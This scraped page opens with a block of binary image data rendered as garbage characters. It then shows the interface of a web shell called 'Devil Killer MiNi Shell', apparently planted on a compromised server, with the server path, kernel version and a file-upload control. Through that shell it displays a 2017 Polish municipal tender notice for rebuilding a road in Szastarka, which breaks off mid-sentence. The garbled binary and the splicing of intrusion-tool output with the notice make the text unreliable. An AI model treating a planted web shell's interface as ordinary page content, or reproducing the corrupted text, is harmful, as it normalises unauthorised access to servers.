JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170210/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170210/23714-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.gminaszastarka.pl' target='_blank'>http://www.gminaszastarka.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 23714 - 2017
              z dnia 2017-02-10 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Szastarka: Przebudowa  drogi gminnej  nr 108619 L Szastarka Stacja  Brzozówka-Kolonia  na odcinku od km 0+195 do km 1+993,   w formule zaprojektuj i wybuduj<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Europejski Fundusz Rolny na rzecz Rozwoju Obszarów Wiejskich operacja typu Budowa lub modernizacja dróg lokalnych" w ramach poddziałania Wsparcie inwestycji związanych z tworzeniem, ulepszeniem lub rozbudową wszystkich rodzajów małej infrastruktury, w tym inwestycji w energię odnawialną i w oszczędzenie energii" objętego Programem Rozwoju Obszarów Wiejskich na lata 2014-2020</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Szastarka, krajowy numer identyfikacyjny
              83040965000000, ul.
               
              ,
              23225  
              Szastarka, woj.
              lubelskie, państwo
              Polska, tel.
              158 714 104, e-mail
              szastarka@bazagmin.pl, faks
              158 714 130.
              <br />
              Adres strony internetowej (URL): www.gminaszastarka.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.gminszastarka.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.gminaszastarka.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie pisemnej, osobiście, za pośrednictwem posłańca, operatora pocztowego <br />
                Adres:
                <br />Gmina Szastarka,  Szastaka 121,23-225 Szastarka</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przebudowa  drogi gminnej  nr 108619 L Szastarka Stacja  Brzozówka-Kolonia  na odcinku od km 0+195 do km 1+993,   w formule zaprojektuj i wybuduj<br /><b>Numer referencyjny: </b>ZP.271.II.4.17<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>3.3.Przedmiotem zamówienia jest opracowanie dokumentacji projektowej oraz wykonanie robót budowlanych obejmujących przebudowę drogi gminnej  nr 108619 L Szastarka Stacja  Brzozówka-Kolonia  na odcinku od km 0+195 do km 1+993, w formule zaprojektuj i wybuduj,  o łącznej długości  1,798 km  oraz sprawowanie nadzoru autorskiego.3.4. Przedmiotowa droga przebiega przez tereny o rzadkiej zabudowie jednorodzinnej, pola, łąki oraznieużytki.   Początek opracowania znajduje się w km 0+300 na granicy wykonanej niedawno nawierzchni bitumicznej, a koniec w km 1+995 na skrzyżowaniu z drogą powiatową nr 2739. Istniejąca nawierzchnia bitumiczna jest zdegradowana. Widoczne są spękania podłużne, poprzeczne i siatkowe oraz ubytki warstw konstrukcyjnych. Brak równości podłużnej i poprzecznej jezdni utrudnia sprawny spływ wód opadowych z jezdni. Na odcinku objętym opracowaniem nie występują chodniki. Zjazdy na działki przyległe do pasa drogowego posiadają nawierzchnię nieutwardzoną. Odwodnienie realizowane jest powierzchniowo do istniejących rowów bocznych, które są zamulone i wymagają oczyszczenia i wyprofilowania. W ciągu rowów pod drogami poprzecznym i zjazdami występują przepusty, które wymagają remontu. Pod droga główną zlokalizowane  są 4 istniejące przepusty w km 0+908, 1+688, 1+972 i 1+977, które wymagają przebudowy. W granicach opracowania występuje uzbrojenie podziemne tj. sieć elektroenergetyczna, sieć telekomunikacyjna, sieć wodociągowa, sieć kanalizacji sanitarnej. Projektowane zagospodarowanie terenu nie powinno kolidować z istniejącym uzbrojeniem terenu.W przypadku zaistnienia kolizji należy wykonać przebudowę urządzeń w niezbędnym zakresie. 3.5. Przedmiot zamówienia obejmuje opracowanie dokumentacji projektowej: 
Dokumentacja projektowa zostanie wykonana na podstawie rozporządzenia Rady Ministrów z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2013 r. poz. 1129), zgodnie z zasadami sztuki budowlanej, ustawą z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2016 r. poz. 290 z późń.zm.) i odnośnymi przepisami wykonawczymi, polskimi normami, lokalnymi uwarunkowaniami dla lokalizacji inwestycji oraz innymi powszechnie obowiązującymi przepisami dotyczącymi prac projektowych, tj.1.wykonanie dokumentacji geodezyjnej i map sytuacyjno-wysokościowych dla celów projektowych w skali 1:500, 2.opracowanie projektu budowlano-wykonawczego branży drogowej dla każdego etapu robót, niezbędnego do uzyskania decyzji o pozwoleniu na budowę(zgłoszeniu), zgodnie z obowiązującymi przepisami prawa i zakresem opisanym w siwz   oraz w  PFU,3.na podstawie opracowanych projektów wykonawczych występujących branż, opracowanie przedmiarów robót, kosztorysów inwestorskich, informacji BIOZ, specyfikacji technicznych wykonania i odbioru robót budowlanych, stałej organizacji ruchu, pozyskanie wymaganych warunków technicznych, opinii, decyzji, uzgodnień zgodnych z wymogami PFU,
4.uzyskanie zatwierdzenia dokumentacji projektowej przez  zamawiającego,5.opracowanie i przedstawienie zamawiającemu do zatwierdzenia szczegółowych STWiORB dla każdego etapu robot,6.wykonanie i zatwierdzenie projektu stałej organizacji ruchu dla każdego etapu robot,
7.opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia (BIOZ) dla  wszystkich branż,8.wystąpienie w imieniu zamawiającego z wnioskiem do Starostwa Powiatowego w Kraśniku  o wycinkę drzew kolidujących z przebudową przedmiotowej drogi,9.opracowanie harmonogramu rzeczowo - finansowego robót budowlanych i   przedłożenie do zatwierdzenia przez zamawiającego,10.pozyskanie we własnym zakresie wszelkich wymaganych opinii, decyzji, uzgodnień dokumentacji, koniecznych do zgłoszenia lub pozwolenia na przebudowę drogi.11.uzyskanie ostatecznej decyzji o pozwoleniu na budowę (zgłoszeniu robót).12.przygotowanie dokumentów wymaganych przepisami prawa, związanych z oddaniem  obiektu do użytkowania,13.wykonania niezbędnych ekspertyz, badań, prób i pomiarów na koszt własny.14.wykonania kosztorysów powykonawczych do celów rozliczeniowych z instytucją dotującą 15.współpraca z Inspektorem Nadzoru oraz zamawiającym w zakresie uzyskania pozwolenia na użytkowanie.
Wymaga się, aby Wykonawca przeniósł na Zamawiającego całość praw autorskich majątkowych oraz własność przedmiotowych projektów, co nastąpi wraz z przekazaniem tych projektów.Dokumentacja projektowa winna być przekazana Zamawiającemu w formie papierowej( w wymaganej ilości egzemplarzy-5egz.) oraz elektronicznej( 1 egz.)- na nośniku CD - umożliwiającej wydrukowanie identycznej kopii dokumentacji papierowej.
Dokumentacja powinna być wykonana w formie zgodnej z przywołanymi powyżej przepisami. Wykonawca po zakończeniu realizacji przedmiotu zamówienia w zakresie wykonania dokumentacji projektowej i uzyskaniu pozwolenia na budowę przedkłada dokumentację zamawiającemu i za pisemnym potwierdzeniem rozpoczyna etap realizacji robót budowlanych w oparciu o opracowaną dokumentację.3.6. Wykonanie robót budowlanych na podstawie opracowanej i uzgodnionej w/w dokumentacji  projektowej obejmuje:1.wykonanie robót budowlanych na podstawie opracowanej i zatwierdzonej dokumentacji projektowej, zgodnie z decyzją o pozwoleniu na budowę, zatwierdzonym harmonogramem rzeczowo-finansowym realizacji robót budowlanych, obowiązującym prawem, normami, zasadami wiedzy technicznej, sztuką budowlana i niniejszą SIWZ,2.opracowanie i przedstawienie Zamawiającemu do zatwierdzenia planu zagospodarowania terenu budowy na czas prowadzenia robót,3.opracowywanie i przestawianie zamawiającemu  co 10 dni  informacji z postęprobót wraz z dokumentacją np. fotograficzną,4.prowadzenie księgi obmiarów robót wykonanych,5.zapewnienie kierownika budowy, kierowników robót wymaganych branż oraz nadzoru autorskiego projektów, wraz prowadzeniem dziennika budowy,  w cenie oferty,6.zapewnienie obsługi geodezyjnej budowy przez geodetę posiadającego odpowiednie uprawnienia,7.przygotowanie harmonogramu badań kontrolnych w odniesieniudo harmonogramu realizacji robot, 8.przeprowadzenie wymaganych badań i pomiarów kontrolnych zgodnie z wymogami SST, (wyniki badań winny być zaakceptowane przez Inspektora Nadzoru),   9.sporządzenie geodezyjnej inwentaryzacji powykonawczej i dostarczenie jej na nośniku CD( 1 egz.)  oraz w formie papierowej ( 4 egz.)10.zagospodarowanie terenu tj.  uporządkowanie obszaru przyległego do terenu prowadzonych robót, odtworzenie trawników i terenów zielonych  przylegających do miejsc prowadzenia robot drogowych,  11.przeprowadzenie wymaganych badań,12.przygotowanie rozliczenia końcowego i sporządzenie w 2 egz. operatu  kolaudacyjnego, który musi zawierać  umowę, ofertę, umowy z ewentualnymi podwykonawcami, harmonogram, tabele elementów rozliczeniowych, polisęubezpieczeniową, protokół przekazania terenu budowy, protokoły robót zakrywanych, badania materiałów, recepty, wyniki pomiarów, wyniki badań laboratoryjnych, deklarację zgodności materiałów, aprobaty, sprawozdania techniczne Wykonawcy, inwentaryzację geodezyjną powykonawczą, rozliczenie finansowe, potwierdzenie zakończenia odbioru  robót, oświadczenia uprawnionych kierowników robót o wykonaniu zadaniazgodnie z przepisami, dokumentację  fotograficzną postępu prac oraz powykonaniu robót, 13. uzyskanie  wymaganych odbiorów oraz przekazanie zamawiającemu zrealizowanych robót, 14. Zakres przedmiotowy robót budowlanych obejmuje wykonanie: 1) Roboty rozbiórkowe i roboty ziemne, 2) Usunięcie drzew i krzewów, 3) Podbudowy, 4)Ławy, krawężniki, obrzeża, ścieki i nawierzchnie,5)Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków,6)Stałą organizację ruchu, 7)Urządzeń bezpieczeństwa ruchu drogowego8)Wykonanie zjazdów z drogi gminnej Nr 108619 L Szastarka Stacja-Brzozówka Kolonia.Szerokość projektowanych zjazdów wynosi 4,0 m. W przypadkach gdy brama wjazdowa jest węższa niż 4,0 m szerokość zjazdu należy dopasować do szerokości bramy. Przecięcie krawędzi zjazdu i drogi wykonać łukiem kołowym o promieniu 3.0 m. W przypadku występowania przy bramie furtki należy zapewnić do niej dojście z kostki betonowej. Skrzyżowanie z droga powiatową nr 2739 należy przebudować, aby kąt przecięcia dróg możliwie najbardziej zbliżyć do kąta prostego. Zbędną część istniejącej nawierzchni należy rozebrać. Wszystkie drogi poprzeczne krzyżujące się z droga gminna należy przebudować zgodnie z planem sytuacyjnym.
Należy zapewnić prawidłowe odwodnienie korpusu drogowego. Nawierzchnię jezdni i poboczy ukształtować tak, aby zapewniony był sprawny spływ wody opadowej z jezdni do rowów drogowych. Rowy boczne należy oczyścić i wyprofilować. Przepusty pod zjazdami wymienić na nowe. W przypadku stwierdzenia złego stanu technicznego przepustów pod drogą główną należy je przebudować. Konstrukcja nawierzchni Należy w możliwie największym stopniu wykorzystać istniejąca nawierzchnię bitumiczną. Zniszczone krawędzie jezdni należy odciąć i w tym miejscu wykonać poszerzenie jezdni o pełnej konstrukcji. Pozostałą część jezdni należy wzmocnić nakładką bitumiczną po wykonaniu frezowania technologicznego. Dla projektowanego wzmocnienia jezdni przyjęto następującą konstrukcję nawierzchni:- warstwa ścieralna AC 8 S 50/70 -  4 cm - warstwa wiążąco  wyrównawcza AC 16 W 50/70  min. - 6 cm
Dla projektowanego poszerzenia jezdni do szerokości 5,5 m (istniejąca nawierzchnia jezdni ma szerokość 5,0m)  oraz dróg poprzecznych przyjęto następująca konstrukcję nawierzchni: - warstwa ścieralna AC 8 S 50/70  - 4 cm - warstwa wiążąca AC 16 W 50/70 - 6 cm - podbudowa z kruszywa łamanego 0/31.5 stabilizowanego mechanicznie	- 20 cm - piasek stabilizowanycementem Rm=2.5 MPa  - 25 cmDla projektowanego dojścia do furtek przyjęto następującą konstrukcję nawierzchni: - kostka betonowa szara  - 6 cm - podsypka cementowo-piaskowa - 3 cm - kruszywo łamane 0/31.5 stabilizowane mechanicznie - 10 cm - piasek stabilizowany cementem Rm=1.5 MPa  - 15 cm Dojścia do furtek należy ograniczyć obrzeżem betonowym o wymiarach 8x30x100 cm Dla projektowanego zjazdu przyjęto następującą konstrukcję nawierzchni: - kruszywo łamane 0/31.5 stabilizowane mechanicznie  - 15 cm - piasek stabilizowany cementem Rm=1.5 MPa  - 15 cm Dla projektowanego pobocza przyjęto następującą konstrukcję nawierzchni: - kruszywo łamane 0/31.5 stabilizowane mechanicznie - 15 cm Zestawienie powierzchni zagospodarowania terenu Poniżej zestawiono powierzchnie projektowanych elementów zagospodarowania terenu: - jezdnia   10120 m2, - dojścia do furtek  35 m2, - zjazdy  925 m2, - pobocze  2405 m2. Klasa drogi: L Prędkość projektowa: 50 km/h
Kategoria ruchu: KR 2Szerokość jezdni:   5.5 m  Szerokość poboczy:   0.75 Wszelkie ilości i parametry podane dla obiektów i robót opisanych są orientacyjne. Ostateczne ilości robót zostaną określone przez Wykonawcę w projekcie budowlano-wykonawczym. Różnice pomiędzy przyjętymi ilościami w PFU a obliczeniami Wykonawcy nie mogą stanowić ewentualnych roszczeń wykonawcy w stosunku do Zamawiającego. 15.  Informacje dodatkowe 1)Zamawiający nie dopuszcza złożenia ofert częściowych, 2)Zamawiający nie przewiduje zawarcia umowy ramowej, 3)Zamawiający nie przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub art. 134 ust. 6 pkt 3 i 4 4)Zamawiający nie dopuszcza składania ofert wariantowych, 5)Zamawiający nie przewiduje rozliczenia w walutach obcych, 6)Zamawiający nie przewiduje aukcji elektronicznej, 7)Zamawiający nie dokonuje zastrzeżenia o obowiązku osobistego wykonania przez wykonawcę kluczowych części zamówienia, 8)Sposób dokumentowania zatrudnienia osób na umowę o pracę, uprawnienia   zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań dotyczących zatrudniania na umowę oraz sankcje z tytułu niespełnienia tych wymagań zawarte zostały w projekcie  umowy stanowiącym integralną część siwz   - zał. nr 5.
9)  Zamawiającynie zastrzega samodzielnego wykonania kluczowych części zamówienia. 10) Wymogi dotyczące umów o podwykonawstwo zawarto w projekcie umowy stanowiącym integralną część siwz  zał. nr 5 11)Informowanie mieszkańców terenu objętego inwestycją o rozpoczęciu, zakończeniui utrudnieniach związanych z prowadzonymi pracami w formie ogłoszeń, oblat, zawiadomień,12)Zorganizowanie zaplecza  inwestycyjnego, w tym należy przewidzieć  dla pracowników przenośną, szczelną kabinę sanitarną, której użytkowanie należy zlecić firmie serwisowej, ponoszenia kosztów zaopatrzenia w energię elektryczną, wodę  we własnym zakresie i na koszt własny, 13)Utrzymania dróg dojazdowych do placu  robót w należytym porządku - zgodnie z art. 20, ust. 12 ustawy z dnia 21 marca 1985 r. o drogach publicznych (Dz. U. z 2015 r. poz. 460 z późn. zm.) oraz oznakowania i zabezpieczenia dróg publicznych w zakresie wynikającym z uzgodnień z zarządcami tych dróg,14)Wykonawca zobowiązany jest do zabezpieczenia terenu w okresie trwania realizacji budowy aż do zakończenia i odbioru ostatecznego robót oraz ogrodzi lub wyraźnie oznakuje teren budowy w sposób uzgodniony z Inwestorem i zarządcą terenu. Wykonawca robót jest odpowiedzialny za jakość ich wykonania oraz zgodność z dokumentacją projektową, specyfikacjami technicznymi.
15)Materiał możliwy do ponownego wykorzystania należy przekazać Inwestorowi w miejsce przez niego wskazane. Roboty ziemne w postaci wykonania wykopów, korytowania oraz plantowania wynikają głównie z konieczności wykonania koryta pod nawierzchnię drogi i zjazdów.Przed przystąpieniem do wykonania nawierzchni należy sprawdzić wskaźnik zagęszczenia gruntu. Jeżeli grunty rodzime w wykopach i miejscach zerowych nie spełniają wymaganego wskaźnika zagęszczenia, to przed ułożeniem konstrukcji nawierzchni należy je dogęścić do wartości wymaganych w BN-77/8931-12 Oznaczenie wskaźnika zagęszczenia gruntu i specyfikacji technicznej wykonania i odbioru robót budowlanych.16) Ochrona interesu osób trzecich Inwestycja musi uwzględniać interesy osób trzecich. W trakcie prowadzenia prac budowlanych Wykonawca musi zapewnić dojazd i dojście do posesji oraz zapewnić ciągłość ruchu na drodze. Dla ochrony interesów osób trzecich wykonawca musi uwzględnić: -zabezpieczenie urządzeń obcych podziemnych i naziemnych, - zapewnienie dojazdów do posesji i gruntów w czasie trwania prac,- rozwiązania techniczne minimalizujące wpływ budowy na środowisko i zdrowie ludzi. Wykonawca w czasie robót ma obowiązek zminimalizować uciążliwości spowodowane przez hałas, wibracje i zakłócenia elektryczne.17) Gospodarka odpadami Wykonawca robót będący posiadaczem odpadów (wytwórca) zobowiązany jest posiadać stosowne pozwolenia na prowadzenie gospodarki odpadami w tym na ich transport (Ustawa z dn. 27.04.001 o odpadach  Dz. U. nr 62 poz. 628 z późniejszymi zmianami). Wszelkie zanieczyszczenia (np. ziemia z wykopów, kruszywo, mieszanka betonowa, opakowania materiałów itp.) lub uszkodzenia dróg publicznych i dojazdów do terenu budowy Wykonawca będzie usuwał na bieżąco i na własny koszt. Wszystkie materiały z robót rozbiórkowych oraz odpady powstałe w czasie robót przygotowawczych i budowlanych zostaną zagospodarowane zgodnie z wymogami ochrony środowiska. 3.8.Szczegółowy opis i zakres przedmiotu zamówienia zawiera Program   funkcjonalno-użytkowy (PFU) stanowiący zał. nr  8 do niniejszej siwz.Zamawiający wymaga, aby przedmiotowe roboty wykonane były zgodnie z:
1)załącznikiem nr 5 do rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 roku w sprawie warunków technicznych, jakimi powinny odpowiadać drogi publiczne i ich usytuowania (Dz.U. z 1999 roku, Nr 43, poz. 430, z późn. zm), 2)działem V rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 30 maja 2000 roku w sprawie warunków, jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie (Dz. U. z 2000 roku, Nr 63 poz. 735, z późn. zm) oraz 3)działem V rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 30 maja 2000 rku w sprawie warunków, jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie (Dz.U. z 2000 roku, Nr 63, poz. 735 z późn. zm).3.9.W przypadku wystąpienia w PFU nazw producenta produkty należy zastąpić równoważnymi. Wykonawca, który powołuje się na rozwiązania równoważne w opisywanym przez Zamawiającego przedmiocie zamówienia jest obowiązany wykazać, że oferowane przez niego roboty spełniają wymagania określone przez Zamawiającego. Wszystkie wskazane w dokumentacji siwz znaki towarowe, nazwy lub pochodzenie należy rozumieć jako przykładowe i rozpatrywać łącznie z wyrazem równoważny".3.10.Wykonawca udzieli gwarancji na wykonane prace na okres co najmniej 36 miesięcy. Jeżeli wykonawca zaoferuje okres gwarancji dłuższy niż minimalny wymagany w siwz, winien on oferowany okres gwarancji wpisać do formularza oferty stanowiącego zał. nr 1 do siwz. Zaoferowanie dłuższego okresu gwarancji niż minimalny okres wymagany w siwz  skutkować będzie przyznaniem punktów w kryterium gwarancja, zgodnie z zasadami określonymi w  pkt XIV ppkt 2 siwz. Zaoferowanie okresu gwarancji krótszego niż minimalny okres wymagany w siwz, skutkować będzie odrzuceniem oferty na podstawie art. 89 ust. 1 pkt 2) ustawy z dnia 29 stycznia 